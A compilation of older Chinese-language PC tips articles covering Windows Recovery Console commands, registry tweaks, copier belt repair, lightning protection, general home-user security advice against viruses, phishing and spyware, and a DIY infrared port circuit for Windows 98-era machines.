共有五种启动类型。前三种类型是：SERVICE_AUTO_START 、SERVICE_DISABLED 和SERVICE_DEMAND_START 。对应的标准启动类型：自动、禁用和手动，通常使用“计算机管理”管理工具中的“服务”进行配置。后两种类型是：SERVICE_BOOT_START 和 SERVICE_SYSTEM_START，通常用于配置加载设备驱动程序的方式。例如，在启动计算机时或启动 Windows 时加载。
    Enable

    启用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。enable 命令仅在使用故障恢复控制台时才可用。

    enable {service_name |device_driver_name}[ startup_type]

    参数

    service_name

    要启用的系统服务的名称。

    device_driver_name

    要启用的设备驱动程序的名称。

    startup_type

    要为服务或设备驱动程序指派的启动类型。有效的启动类型包括：

SERVICE_BOOT_START
SERVICE_SYSTEM_START
SERVICE_AUTO_START
SERVICE_DEMAND_START
    范例

    下例将 Eventlog 服务的启动类型设为自动或 SERVICE_AUTO_START：

    enable eventlog service_auto_start

    注意

如果不指派启动类型，enable 命令将列出在 service_name 中指定的服务或设备驱动程序的当前启动类型。
使用 enable 命令更改启动类型时，上次启动类型的名称将显示在屏幕上。应该记下该名称，以便在需要时将启动类型恢复为上次的设置。
    Exit

    关闭故障恢复控制台并重新启动计算机。exit 命令仅在使用“故障恢复控制台”时才可用。

    exit

    参数　　无

    Help

    提供有关故障恢复控制台命令的联机信息。

    help [ commandname]

    参数　　无

    列出故障恢复控制台中提供的命令。

    commandname

    提供有关命令信息，包括命令使用的参数。

    注意

有两种方法可以获得命令的联机帮助。可以指定 help 命令后的命令名称，或者可以在命令提示符中键入该命令名称和 /?。开关。例如，键入下列命令可以获得有关extract 命令的信息：
help extract
extract /?

    Listsvc

    列出计算机上可以使用的服务和驱动程序。listsvc 命令仅在使用故障恢复控制台时才可用。

    listsvc

    参数　　无

    Logon

    登录到 Windows 安装。logon 命令仅在使用故障恢复控制台时才可用。

    logon

    参数　　无

    注意

logon 命令将列出所有检测到的 Windows 安装，需要安装的本地管理员密码才能登录。
如果 3 次登录尝试都失败，“故障恢复控制台”会退出并且计算机将重新启动。
    Net use

    将网络共享连接到驱动器号。含有下列参数的 net use 命令仅在使用故障恢复控制台时可用。在命令提示符下可以使用带不同参数的 net use 命令。

    语法

    net use [ \\ ComputerName\ShareName [ /user:[ DomainName\ ] UserName] password] |[ drive
letter:] [ /d]

    参数

    \\servername\sharename

    指定服务器和共享资源的名称。如果 computername 包含空白字符，则将计算机名从双反斜杠（\\）到计算机名结尾用引号（"）括起来。计算机名长度可以是 1 到 15 个字符。

    /user

    指定建立连接的用户名。

    域名

    确认用户的凭据时所要使用的域名。

    用户名

    指定登录时使用的用户名。

    密码

    指定访问共享资源所需的密码。不输入密码，将给出要键入密码的提示。在密码提示行处键入密码时不显示密码。

    /d

    表示将不断开该连接。

    Set

    显示和设置“故障恢复控制台”的环境变量。set 命令是必须与安全模板一同使用的可选命令。

    含有不同参数的 set 命令仅在使用故障故障恢复控制台时可用。可在命令提示符下使用带不同参数的 set 命令。

    set [ variable=[ string] ]

    参数

    variable

    指定需要设置或修改的变量。

    “故障恢复控制台”支持以下环境变量：

变量 说明
AllowWildCards 允许某些命令（如 del 命令）支持通配符。
AllowAllPaths 允许访问系统上的所有文件和目录。
AllowRemovableMedia 允许文件复制到可移动媒体上，如软盘。
NoCopyPrompt 覆盖现有文件时不显示提示。

    string

    指定要与指定变量关联的字符串。

    范例

    下例允许在某些故障恢复控制台命令中使用通配符：

    set allowwildcards=true

    指定要删除的目录的位置和名称。不能使用通配符。

    注意

目录必须为空否则命令失败。
Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Systemroot

    将当前目录设置为用户登录到的 Windows 安装系统的 systemroot 文件夹。systemroot 命令仅在使用故障恢复控制台时可用。

    systemroot

    参数　　无


复印机传送带的维修方法

《一键清理系统垃圾》

复印机传送带的维修方法

    复印机使用一段时间后，走纸传送带由于受到高温烘烤和机械磨损，与驱动轮的磨擦力减小，不能正常运转，往往造成卡纸。一般的修理方法，都是一换了之。但四条一套的传送带，一般要120元钱左右，影响复印成本。有一定经验的人可试用下面的方法修理。
    1.打开复印机前门，仔细观察，如果是由于墨粉污染而引起的打滑，经过彻底清洁后，可排除故障。
    2.若传送带只有少许磨损，可用手小心地把每条胶带里外翻转，增加磨擦力，故障可排除。
    3.若胶带尚完好，只是少许变长。可按更换传送带的方法，拆下传送带支架，底面朝上放好，拆下八个白色的张紧轮。把一张复印纸剪成15毫米宽的小条，再折叠成二叠，折成5毫米宽，三张纸厚的小条，垫在每一个张紧轮的支架下面（最好用透明胶带固定），然后照原样装好。
    经本人实践，因原装传送带质量较好，用第3法修理，一般可再印6万～8万张复印纸，比一般耗材店买的新传送带还要耐用。


个人电脑防雷措施

《一键清理系统垃圾》

个人电脑防雷措施

全球每天约发生800万次闪电，每个闪电的电压高达l亿到10亿伏特，电流强度达2万至4万安培。雷击放出的强电会造成电力设施的损坏，引起电信、卫星、移动通讯服务的中断，导致煤炭、石油化工、纺织易燃物品火灾事故，更为严重的是带来人员伤亡。本文主要谈谈室内电器特别是微机防止雷击的预防方案。 　　一般雷电进入室内有两种情况：从电源线窜入和从信号线入侵。 　　电源入侵 　　在现代建筑物上，我们能看到避雷装置，当建筑物直接受到雷击后，强大的电流沿着接地引线导入地面，防止了雷电对建筑物的破坏。我们在室内同样需要采取一些必要的防雷措施。从技术上讲：我们需要在计算机、家用电器、通信设备等上安装电源防雷装置。但实际上，由于高层建筑都已经有较为完善的防雷击措施，所以建筑物内的用户一般就无需从电源角度再来考虑防雷击的问题。 　　信号线入侵 　　此处入侵主要是感应雷造成的雷电浪涌。感应雷一般来自对地雷击和云间放电，其中对地雷击产生的感应浪涌电压较大，一般500米范围的电子信息设备均可能遭其破坏。根据雷电电磁脉冲理论和实践经验证明：电子计算机及其它信息设备损坏的主要原因是雷电感应浪涌电压造成，它可以通过各种信号引线把感应浪涌电压波引入设备内部，破坏其芯片和接口。所以应在信号线间加装信号防雷装置。 [img]c:\mydocument\my pictures\020730_leiji[/img] 防雷击示意图　　具体地说，我们在个人电脑联网系统上可以采取如下措施： 　　1． 在调制解调器（Modem，包括Cable Modem和xDSL Modem）的接入线与入户信号线（如电话线）之间，安装一个信号防雷器。 　　如果你的电子电工技术掌握得不错，可以自己采购TVS管子制作一个简单的防雷器，这是最经济的。 　　2． 如果你使用了UPS作为微机不间断电源，建议你在UPS之前加装电源避雷器对UPS予以保护。 　　3． 购买具有防雷击功能的调制解调器。这种调制解调器价格可能稍贵一点，购买时要看清楚其功能。


个人电脑用户的九大安全防范策略

《一键清理系统垃圾》

个人电脑用户的九大安全防范策略

    一、 杀（防）毒软件不可少

    病毒的发作给全球计算机系统造成巨大损失，令人们谈“毒”色变。上网的人中，很少有谁没被病毒侵害过。对于一般用户而言，首先要做的就是为电脑安装一套正版的杀毒软件。

    现在不少人对防病毒有个误区，就是对待电脑病毒的关键是“杀”，其实对待电脑病毒应当是以“防”为主。目前绝大多数的杀毒软件都在扮演“事后诸葛亮”的角色，即电脑被病毒感染后杀毒软件才忙不迭地去发现、分析和治疗。这种被动防御的消极模式远不能彻底解决计算机安全问题。杀毒软件应立足于拒病毒于计算机门外。因此应当安装杀毒软件的实时监控程序，应该定期升级所安装的杀毒软件（如果安装的是网络版，在安装时可先将其设定为自动升级），给操作系统打相应补丁、升级引擎和病毒定义码。由于新病毒的出现层出不穷，现在各杀毒软件厂商的病毒库更新十分频繁，应当设置每天定时更新杀毒实时监控程序的病毒库，以保证其能够抵御最新出现的病毒的攻击。

    每周要对电脑进行一次全面的杀毒、扫描工作，以便发现并清除隐藏在系统中的病毒。当用户不慎感染上病毒时，应该立即将杀毒软件升级到最新版本，然后对整个硬盘进行扫描操作，清除一切可以查杀的病毒。如果病毒无法清除，或者杀毒软件不能做到对病毒体进行清晰的辨认，那么应该将病毒提交给杀毒软件公司，杀毒软件公司一般会在短期内给予用户满意的答复。而面对网络攻击之时，我们的第一反应应该是拔掉网络连接端口，或按下杀毒软件上的断开网络连接钮。

    二、个人防火墙不可替代

    如果有条件，安装个人防火墙（Fire Wall）以抵御黑客的袭击。所谓“防火墙”，是指一种将内部网和公众访问网（Internet）分开的方法，实际上是一种隔离技术。防火墙是在两个网络通讯时执行的一种访问控制尺度，它能允许你“同意”的人和数据进入你的网络，同时将你“不同意”的人和数据拒之门外，最大限度地阻止网络中的黑客来访问你的网络，防止他们更改、拷贝、毁坏你的重要信息。防火墙安装和投入使用后，并非万事大吉。要想充分发挥它的安全防护作用，必须对它进行跟踪和维护，要与商家保持密切的联系，时刻注视商家的动态。因为商家一旦发现其产品存在安全漏洞，就会尽快发布补救（Patch） 产品，此时应尽快确认真伪（防止特洛伊木马等病毒），并对防火墙进行更新。在理想情况下，一个好的防火墙应该能把各种安全问题在发生之前解决。就现实情况看，这还是个遥远的梦想。目前各家杀毒软件的厂商都会提供个人版防火墙软件，防病毒软件中都含有个人防火墙，所以可用同一张光盘运行个人防火墙安装，重点提示防火墙在安装后一定要根据需求进行详细配置。合理设置防火墙后应能防范大部分的蠕虫入侵。

    三、分类设置密码并使密码设置尽可能复杂

    在不同的场合使用不同的密码。网上需要设置密码的地方很多，如网上银行、上网账户、E-Mail、聊天室以及一些网站的会员等。应尽可能使用不同的密码，以免因一个密码泄露导致所有资料外泄。对于重要的密码（如网上银行的密码）一定要单独设置，并且不要与其他密码相同。

    设置密码时要尽量避免使用有意义的英文单词、姓名缩写以及生日、电话号码等容易泄露的字符作为密码，最好采用字符与数字混合的密码。

    不要贪图方便在拨号连接的时候选择“保存密码”选项;如果您是使用Email客户端软件（Outlook Express、Foxmail、The bat等）来收发重要的电子邮箱，如ISP信箱中的电子邮件，在设置账户属性时尽量不要使用“记忆密码”的功能。因为虽然密码在机器中是以加密方式存储的，但是这样的加密往往并不保险，一些初级的黑客即可轻易地破译你的密码。

    定期地修改自己的上网密码，至少一个月更改一次，这样可以确保即使原密码泄露，也能将损失减小到最少。

    四、不下载来路不明的软件及程序，不打开来历不明的邮件及附件

    不下载来路不明的软件及程序。几乎所有上网的人都在网上下载过共享软件（尤其是可执行文件），在给你带来方便和快乐的同时，也会悄悄地把一些你不欢迎的东西带到你的机器中，比如病毒。因此应选择信誉较好的下载网站下载软件，将下载的软件及程序集中放在非引导分区的某个目录，在使用前最好用杀毒软件查杀病毒。有条件的话，可以安装一个实时监控病毒的软件，随时监控网上传递的信息。

    不要打开来历不明的电子邮件及其附件，以免遭受病毒邮件的侵害。在互联网上有许多种病毒流行，有些病毒就是通过电子邮件来传播的，这些病毒邮件通常都会以带有噱头的标题来吸引你打开其附件，如果您抵挡不住它的诱惑，而下载或运行了它的附件，就会受到感染，所以对于来历不明的邮件应当将其拒之门外。

    五、警惕“网络钓鱼”

    目前，网上一些黑客利用“网络钓鱼”手法进行诈骗，如建立假冒网站或发送含有欺诈信息的电子邮件，盗取网上银行、网上证券或其他电子商务用户的账户密码，从而窃取用户资金的违法犯罪活动不断增多。公安机关和银行、证券等有关部门提醒网上银行、网上证券和电子商务用户对此提高警惕，防止上当受骗。

    目前“网络钓鱼”的主要手法有以下几种方式：

    （1）发送电子邮件，以虚假信息引诱用户中圈套。诈骗分子以垃圾邮件的形式大量发送欺诈性邮件，这些邮件多以中奖、顾问、对账等内容引诱用户在邮件中填入金融账号和密码，或是以各种紧迫的理由要求收件人登录某网页提交用户名、密码、身份证号、信用卡号等信息，继而盗窃用户资金。

    （2）建立假冒网上银行、网上证券网站，骗取用户账号密码实施盗窃。犯罪分子建立起域名和网页内容都与真正网上银行系统、网上证券交易平台极为相似的网站，引诱用户输入账号密码等信息，进而通过真正的网上银行、网上证券系统或者伪造银行储蓄卡、证券交易卡盗窃资金;还有的利用跨站脚本，即利用合法网站服务器程序上的漏洞，在站点的某些网页中插入恶意Html代码，屏蔽住一些可以用来辨别网站真假的重要信息，利用cookies窃取用户信息。

    （3）利用虚假的电子商务进行诈骗。此类犯罪活动往往是建立电子商务网站，或是在比较知名、大型的电子商务网站上发布虚假的商品销售信息，犯罪分子在收到受害人的购物汇款后就销声匿迹。

    （4）利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。木马制作者通过发送邮件或在网站中隐藏木马等方式大肆传播木马程序，当感染木马的用户进行网上交易时，木马程序即以键盘记录的方式获取用户账号和密码，并发送给指定邮箱，用户资金将受到严重威胁。

    （5）利用用户弱口令等漏洞破解、猜测用户账号和密码。不法分子利用部分用户贪图方便设置弱口令的漏洞，对银行卡密码进行破解。

    实际上，不法分子在实施网络诈骗的犯罪活动过程中，经常采取以上几种手法交织、配合进行，还有的通过手机短信、QQ、MSN进行各种各样的“网络钓鱼”不法活动。反网络钓鱼组织APWG（Anti-Phishing Working Group）最新统计指出，约有70.8%的网络欺诈是针对金融机构而来。从国内前几年的情况看大多Phishing只是被用来骗取QQ密码与游戏点卡与装备，但今年国内的众多银行已经多次被Phishing过了。可以下载一些工具来防范Phishing活动，如Netcraft Toolbar，该软件是IE上的Toolbar，当用户开启IE里的网址时，就会检查是否属于被拦截的危险或嫌疑网站，若属此范围就会停止连接到该网站并显示提示。

    六、防范间谍软件

    最近公布的一份家用电脑调查结果显示，大约80%的用户对间谍软件入侵他们的电脑毫无知晓。间谍软件（Spyware）是一种能够在用户不知情的情况下偷偷进行安装（安装后很难找到其踪影），并悄悄把截获的信息发送给第三者的软件。它的历史不长，可到目前为止，间谍软件数量已有几万种。间谍软件的一个共同特点是，能够附着在共享文件、可执行图像以及各种免费软件当中，并趁机潜入用户的系统，而用户对此毫不知情。间谍软件的主要用途是跟踪用户的上网习惯，有些间谍软件还可以记录用户的键盘操作，捕捉并传送屏幕图像。间谍程序总是与其他程序捆绑在一起，用户很难发现它们是什么时候被安装的。一旦间谍软件进入计算机系统，要想彻底清除它们就会十分困难，而且间谍软件往往成为不法分子手中的危险工具。

    从一般用户能做到的方法来讲，要避免间谍软件的侵入，可以从下面三个途径入手：

    （1）把浏览器调到较高的安全等级——Internet Explorer预设为提供基本的安全防护，但您可以自行调整其等级设定。将Internet Explorer的安全等级调到“高”或“中”可有助于防止下载。

    （2）在计算机上安装防止间谍软件的应用程序，时常监察及清除电脑的间谍软件，以阻止软件对外进行未经许可的通讯。

    （3）对将要在计算机上安装的共享软件进行甄别选择，尤其是那些你并不熟悉的，可以登录其官方网站了解详情；在安装共享软件时，不要总是心不在焉地一路单击“OK”按钮，而应仔细阅读各个步骤出现的协议条款，特别留意那些有关间谍软件行为的语句。

    七、只在必要时共享文件夹

    不要以为你在内部网上共享的文件是安全的，其实你在共享文件的同时就会有软件漏洞呈现在互联网的不速之客面前，公众可以自由地访问您的那些文件，并很有可能被有恶意的人利用和攻击。因此共享文件应该设置密码，一旦不需要共享时立即关闭。

    一般情况下不要设置文件夹共享，以免成为居心叵测的人进入你的计算机的跳板。

    如果确实需要共享文件夹，一定要将文件夹设为只读。通常共享设定“访问类型”不要选择“完全”选项，因为这一选项将导致只要能访问这一共享文件夹的人员都可以将所有内容进行修改或者删除。Windows98/ME的共享默认是“只读”的，其他机器不能写入;Windows2000的共享默认是“可写”的，其他机器可以删除和写入文件，对用户安全构成威胁。

    不要将整个硬盘设定为共享。例如，某一个访问者将系统文件删除，会导致计算机系统全面崩溃，无法启动。

    八、不要随意浏览黑客网站、色情网站

    这点勿庸多说，不仅是道德层面，而且时下许多病毒、木马和间谍软件都来自于黑客网站和色情网站，如果你上了这些网站，而你的个人电脑恰巧又没有缜密的防范措施，哈哈，那么你十有八九会中招，接下来的事情可想而知。

    九、定期备份重要数据

    数据备份的重要性毋庸讳言，无论你的防范措施做得多么严密，也无法完全防止“道高一尺，魔高一丈”的情况出现。如果遭到致命的攻击，操作系统和应用软件可以重装，而重要的数据就只能靠你日常的备份了。所以，无论你采取了多么严密的防范措施，也不要忘了随时备份你的重要数据，做到有备无患！


更改临时文件夹的路径

《一键清理系统垃圾》

更改临时文件夹的路径

问：我使用的系统为Windows XP，我想把系统临时文件(Temp文件)存放区由C盘移到其他分区(如D盘)，请问该如何操作？

答：在“我的电脑”上点鼠标右键，选择“属性”，然后进入高级选项，点“环境变量”，在“系统变量”下拉菜单中找到“TEMP”、“TMP”这两项，分别编辑，将变量值设为你需要改变的路径(例如D:\temp)，注意两项改为相同路径，然后在D盘上建立一个temp目录，最后重启计算机即可。


更改屏幕保护程序关联方式

《一键清理系统垃圾》

更改屏幕保护程序关联方式

    问：最近不知道做了什么操作，双击电脑上的屏幕保护程序文件(扩展名为SCR)后，会自动用写字板打开。请问如何正确打开屏幕保护程序呢？

    答：屏幕保护程序是由系统直接调用的。如果你想修改为默认的模式，打开注册表编辑器，找到HKEY_CLASSES_ROOT\scrfile\shell\open\command，双击右边窗格里面的默认值，然后输入：“"%1" /S”(不包括全角引号，注意%1是被半角引号保护起来的)，确定；然后找到HKEY_CLASSES_ROOT\.scr，确认右边的默认值是“scrfile”(不包括引号)即可。


调整调出输入法的顺序

《一键清理系统垃圾》

调整调出输入法的顺序

    1.修改注册表法：
    在注册表编辑器(在“开始/运行”对话框中输入“REGEDIT”)中展开：“HKEY_CURRENT_USER\Keyboard Layout\Preload”分支，可看到名为”1”、”2”、”3”…的文件夹，它们分别顺序对应输入法菜单中的各项输入法。假设当前输入法菜单中，全拼对应的文件名是2，智能ABC对应的文件名是5，可先将5改为6(点右键选“重命名”即可修改)，然后将2改为5，再将6改为2，最后重启系统。可看到输入法菜单中全拼和智能ABC的位置调换了。(辽宁 王岩)

    2.快捷键法：
    打开“控制面板”，双击“输入法”，启动“输入法属性”对话框，选择“热键”选项卡。通过“基本键”和“组合键”为各输入法定义不同的快捷键。如将“王码五笔输入法”定义快捷键为“Ctrl+Alt+5”，以后要使用五笔输入法，按下“Ctrl+Alt+5”组合键即可。此法虽未实际调整输入法位置，但在你心中却有一明了的顺序，可让你随意调出。

    注：此方法只适合Win9X/2000。

    3.软件法
    我们可以用《Windows优化大师》或《超级魔法兔子》等软件来调整。运行《Windows优化大师》后，进入“系统个性设置”选项卡中的“输入法顺序”，选中任一输入法后，通过右边的“向上”、“向下”按键，调整到合适位置即可；同样，“超级魔法兔子”也用一个“输入法”选项供调整。(重庆 安顺)

    4.重装法
    重新添加输入法以达到调整顺序的目的，具体方法：在控制面板中找到“输入法”图标双击打开输入法，找到需要调整的输入法，把它前面的输入法依次删除(这里删除并不是真的把输入法从电脑中删除，只是把它清出输入法列表)再按想要的顺序依次地添加上，注意先安装的输入法会排在前面。这样输入法的顺序就得到了调整。(吉林 海浪轻风)


更改系统源文件途径

《一键清理系统垃圾》

更改系统源文件途径

在开始－运行输入regedit进入注册表，依次展开到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup。更改右边窗口里的Installation Sources、ServicePackSourcePath、SourcePath三个键值为新的途径。

电脑报内容：
1.在Windows98中：点击开始菜单，进入运行对话框，在对话框中输入“regedit”，打开注册表编辑器。打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup主键并选中它，双击右边窗口中的“SourcePath”，在键值中输入需要的路径即可。

    2.在Windows NT/2000/XP中：打开HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Setup主键并选中它，双击右边窗口中的“SourcePath”，在键值中输入需要的路径即可。


REGEDIT4

《一键清理系统垃圾》

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer]
"Max Cached Icons"=dword:00002000
"AlwaysUnloadDLL"="1"


快速关闭没有响应的程序

《一键清理系统垃圾》

快速关闭没有响应的程序

在“开始→运行”框中输入“Regedit”，打开“注册表编辑器”，在HKEY-CURRENT-USER下新建串值Waittokillapptimeout，将其键值设为1000（ms）或更小。

允许强行关机
进入HEKY-USERS\.DEFAULT\Control Panel\desktop，创建一个字符串“AutoEndTask”，将其键值设为“1”即可。

对于真正的死机，一般只能两次按下 “Ctrl+Alt+Del” 组合键或按主机箱上的“Reset”键（因为消耗资源较少，故前者优先）来重新启动了。

系统死机时自动重新启动
进入HKEY_LOCAL_MACHINE\System\CurrentControlSet\C-o-n-trol\CrashControl主键，在右边的窗口中修改“AutoReboot”，将其的键值改为“1”。


红外接口DIY

《一键清理系统垃圾》

红外接口DIY

    编者按：红外线通讯是一种廉价、近距离、无线、低功耗、保密性强的通讯方案，在PC机中主要应用于无线数据传输，有时也用于无线网络接入和近程遥控。目前几乎所有主板均提供有红外线接口，配合支持红外通讯的操作系统（如Windows 98、Windows 2000、Windows CE 2.X）可与带有红外线接口的笔记本电脑、掌上电脑、移动电话、调制解调器、打印机、扫描仪、数码像机、游戏控制器、鼠标、键盘（将来还有传真机、复印机、摄影机……）等设备实现红外通讯，由于市面上较少有红外接口连接器出售，下文提供一种DIY方案，按下述方法实施，将会使你的爱机具有红外通讯功能。
    拙作《用红外接口进行资料传输》于去年第42期刊发以后，很多朋友来函询问主板红外接口连接器的详细电路和具体自制方法，本文详细描述最简红外接口连接器的制作方法，并给出一种功能更强的电路供各位同行DIY。
#1　　一、最简实施电路
    红外接口连接器的作用是将计算机红外接口输出的电脉冲信号转换为光脉冲信号输出，并将接收到的光脉冲信号转换为电脉冲信号通过红外接口输入主机。
    主板红外线接口大多为五针插座，其针脚定义分别为：＋5V（电源正）、NC（未定义）、IRRX（Infrared Receive，红外接收）、GND（地）、TRTX（Infrared Transmit，红外传输）。根据红外数据协会提供的异步串口通讯标准，TRTX引脚能提供大于6.0mA的输出电流，IRRX引脚吸收小于1.5 mA电流即能对输入信号作出反映。^01030201a^1是红外数据协会（Infrared Data Association） 检测红外产品的标准方案示例（简化了抗干扰电路），也是DIY红外接口连接器的最简方案。笔者使用这个电路在台式机与笔记本电脑之间通讯，通讯速率能达到57.6Kbps。
    说明：1）红外数据协会是国际性非赢利组织，3COM、Canon、HP、IBM、Intel、Sharp、Sony、Microsoft 、NEC等160多个公司均是该组织成员；2）异步串口最高通讯速率为115.2Kbps；3）当前大多笔记本电脑、掌上电脑提供有9600bps～115.2Kbps、1.15Mbps、4Mbps的通讯标准。
    发射电路由红外线发射管D和电阻R1组成，红外线发射管D的作用是电脉冲信号转换为光信号送出，当主板红外接口输出变化的电脉冲信号时，红外线发射管D发射出的红外线强度就随之变化。电阻R1的作用是限流，电阻R1取值越小通过红外线发射管D的电流越大，红外线发射管D的发射功率也越大，发射距离越远；电阻R1取值过小会损坏红外线发射管T或主板红外线接口。
    接收电路由光电接收管U和电阻R2组成，光电接收管U的作用是将接收到的光信号转换为电信号，电阻R2的作用是取样，称为取样电阻。当红外光照射光电接收管U时，光电接收管U的电阻将减小，使通过光电接收管U和取样电阻R2的电流增大，从而在取样电阻R2两端产生随入射红外光强弱变化的电压，此变化的电压信号经红外接口输入主机。由于不同光电接收管的性能参数不一，电阻R2的阻值光电接收管需根据实际情况作一定调整。常见光电接收管有两种形式，一种是光电接收二极管，一种是光电接收三极管（只有两只引脚）。光电接收三极管较为常见。使用光电接收二极管接入图1电路时，光电接收二极管的负极应接＋5V一端（参见^01030201c^3）。
#1　　二、取材与制作工具
    制作红外接口连接器首先需要准备一个红外通讯对象，如笔记本电脑、掌上电脑、移动电话，本文以笔记本电脑为通讯对象讨论制作方法。
    红外发射管接收管价格低廉，大多电子市场有售，约2元/对。也可取用机械鼠标中的两对光电发射接收管，只是鼠标中的光电发射接收管大多不是红外线发射接收管，性能不太好（能够使用），使用时需注意避免其它光线干扰。笔者在一只5英寸软驱中拆取了三对光电发射接收管（00磁道光电检测、索引孔光电检测、写保护光电检测），其光电接收管性能相当好，实际使用时在一米远处安置了一只25W白炽灯和一只15W日光灯，对连机通讯没有产生任何影响。
    在3英寸软驱中，通常只有一对光电发射接收管（00磁道光电检测）。该对光电发射接收管嵌在一黑色凹形塑料外壳中，安装在磁头传动螺杆下的电路板上（4只引脚）。
    根据红外数据协会的红外设备通讯标准，红外设备间通讯使用850nm～890nm（不得超过950 nm）的近红外线，日光和普通白炽灯中实际上包含有这种近红外线，鼠标中的光电发射接收管也能发射和接收此类近红外线。但如果你选用了远红外的光电发射接收管，有可能导致通讯无法进行。一般用户自制建议使用鼠标或软驱中的光电发射接收管。
    图1中电阻可选用任意功率的电阻，需要的工具和材料还有万用表、电烙铁、焊锡、松香和连线四条，连线最好选用有色线以方便区分。连接主板红外插座的插头选用PS/2接口连接器的五孔四线插头最为合适；笔者使用了连接声卡和光驱的音源线（四线），取出其中的一条红色连线（包括插头）连接5V电源。
#1　　三、准备工作
    准备工作一是在BIOS中打开红外接口，二是在Windows 98中安装相应接口、通讯软件和通讯协议。在BIOS中打开红外接口启动PC机后，Windows 98会给出提示，按提示即可安装好相应接口、通讯软件和通讯协议。安装过程简单方便，一般不会出现问题。具体安装内容和通讯软件使用方法在本报42期《用红外接口进行资料传输》一文中有详细描述，此处不再介绍。完成上述工作后即可在 “控制面板”中双击“红外线”，打开“红外线监视器”，利用“红外线监视器”进行以下测试与调试。
    需要说明的是Windows 95没有提供对红外接口的支持，Windows 95 OSR2虽然提供了对红外接口的支持，但对红外通讯功能的支持不好，此外Windows 95 OSR2未提供有“快速红外线传输协议”和“红外线接收者”，如果你使用PC机的红外功能通讯，建议你安装Windows 98。
#1　　四、元件测试
    元件测试非常重要，使用了一只性能不好的元件，调试时会耽误你不少时间，还有可能损坏设备，请在实施时重视这一环节。由于不同万用表内阻不同，测试结果也不尽相同，下文中所述内容均指使用500型万用表在可见光源（白炽灯）下的测试值。
    1.测试红外线发射管
    红外线发射管是一只二极管，可用万用表电阻R×K档测量红外线发射管正反向电阻，反向电阻通常为无穷大，正向电阻一般为15KΩ。
    从PC机红外接口的TRTX（红外传输）和GND（地）两引脚接出二根引线，TRTX引脚接红外线发射管正极，GND（地）接红外线发射管负极，将红外线发射管对准笔记本电脑的红外线发射窗口，笔记本电脑的红外线监视器就会发现红外通讯对象——“你的PC”。
    2.测试光电接收管
    测试光电接收三极管时，用万用表电阻R×K档测量两只引脚间的正反向电阻，光电接收管用反向电阻应大于500KΩ（越大越好），不受光线照射影响；正向暗电阻（不受光线照射时）应大于300KΩ（越大越好），正向明电阻（强光照射时）应小于30Ω（越小越好）。打开笔记本电脑中Windows 98的红外线监视器如^01030201b^2，将光电接收管对准笔记本电脑的红外线发射窗口，当笔记本电脑红外线监视器发出检测信号时，光电接收管正向电阻应自大而小变化，笔者的测试值是从大于500KΩ减小至30KΩ。如果电阻无变化或变化小说明光电接收管性能不好。测试光电接收二极管时，万用表电阻R×K档测量光电二极管两只引脚间的正反向电阻，正向电阻约为5K左右，不受光线照射影响；反向暗电阻（不受光线照射时）应大于500KΩ（越大越好），反向明电阻（强光照射时）小于0Ω，小于0Ω的原因是受光线照射后二极管PN结将获得的光能转换为电能，提供了0.7V左右的结电压。机械鼠标中的光电接收三极管大多是光电接收三极管（也有使用光电接收二极管的鼠标），与普通市售光电接收三极管不同，有三只引脚，因为其是由两只光电接收三极管构成，中间是公共极，实际使用时可只使用其中一只或两只并联使用。
#1　　五、连机调试
    参照图1连接好电路就可以连机调试了，将红外光电发射接收管对准笔记本电脑的红外线发射窗口，双方的“红外线监视器”就会提示发现红外通讯对象。如果调试过程中打开音箱，会有美妙的声音提示你连接成功。
    如果连机调试出现问题，请按下述方法解决：
    1.笔记本电脑无法检测到PC
    用万用表直流电压档测量红外接口TRTX（红外传输）和GND（地）两只引脚间的电压，当PC红外线监视器发出检测信号时，TRTX引脚电压由0向上波动至0.7V左右，如无电压波动属PC红外接口故障。如有电压波动请检查红外发射管是否接反（基本无电流）；通过红外发射管的电流是否有变化；如通过红外发射管的电流有变化，笔记本还是无法检测到PC，说明红外发射管性能不良。
    2.PC无法检测到笔记本电脑
    用万用表直流电压档测量取样电阻R2两端的电压，当笔记本电脑红外线监视器发出检测信号时，取样电阻两端的电压由0向上波动至0.7V左右，如无电压波动请检查光电接收管是否接反，如电压波动小请适当增加取样电阻R2的阻值，如电压波动过大请适当减小取样电阻R2的阻值。电阻R2的调整有一定难度，过大会导致抗干扰能力下降，过小会导致灵敏度降低（接收距离减小），最好串联一只电位器精心调节，方能获得最佳接收效果和接收距离。
    3.通讯时常中断
    通讯时常中断可在红外线监视器/选项标签中选择“连接速度限制为” 复选框，在其后的选择框中限制红外通讯的速度，在很多情况下，用限制速度的方法进行通讯可以消除大量重试，改善通讯质量。
    通讯时常中断大多是外部环境不佳导致，原因主要有：外部光源干扰、连线过长导致的信号衰减、电源性能不良带来的电磁干扰。电源性能不良带来的电磁干扰可通过加装抗干扰电路解决。
    4.通讯距离短
    按上述方法制作的红外接口有效通讯距离为0.3m，如果你想增加发射距离，可用增加红外发射管的数量或增大红外发射管的电流（即增大发射功率）方法实现。需要提醒注意的是，根据红外数据协会的红外通讯标准，一般红外通讯设备的通讯距离仅为1～3m，如果你想增加距离，请先了解通讯对象的接收距离。如果通讯对象（如笔记本电脑）发射功率不够，你将无法接收到对方发出的信号。当然你也可以参照图3电路加装光放大器，扩展红外设备的通讯距离。
#1　　六、连机实战
    笔记本电脑与PC进行红外通讯有以下四种方案：
    1.在资源管理器中选中用鼠标右击要传输文件或目录，选择“发送到/红外线接收者”；
    2.选择“我的电脑/红外线接收者” 图标，打开“红外线传输”窗口，单击“发送文件”按钮后，选择要发送的文件；
    3.在“资源管理器”中选择文件后将其拖到“我的电脑/红外线接收者”图标上；
    4.选择“开始/程序/附件/通讯/直接电缆连接”后，即可以利用Windows 98提供“直接电缆连接”通过红外线接口实施通讯。通过红外线接口运行直接电缆连接时，红外线发送、接收装置将取代电缆，不需使用串行或并行电缆连机。“直接电缆连接”的功能比“红外线接收者”略强，可以使用对方提供的所有共享资源，如能使用对方的打印机和运行对方的程序。此外使用“直接电缆连接”连机通讯的传输速度比前三种方法快很多（约4∶1）。
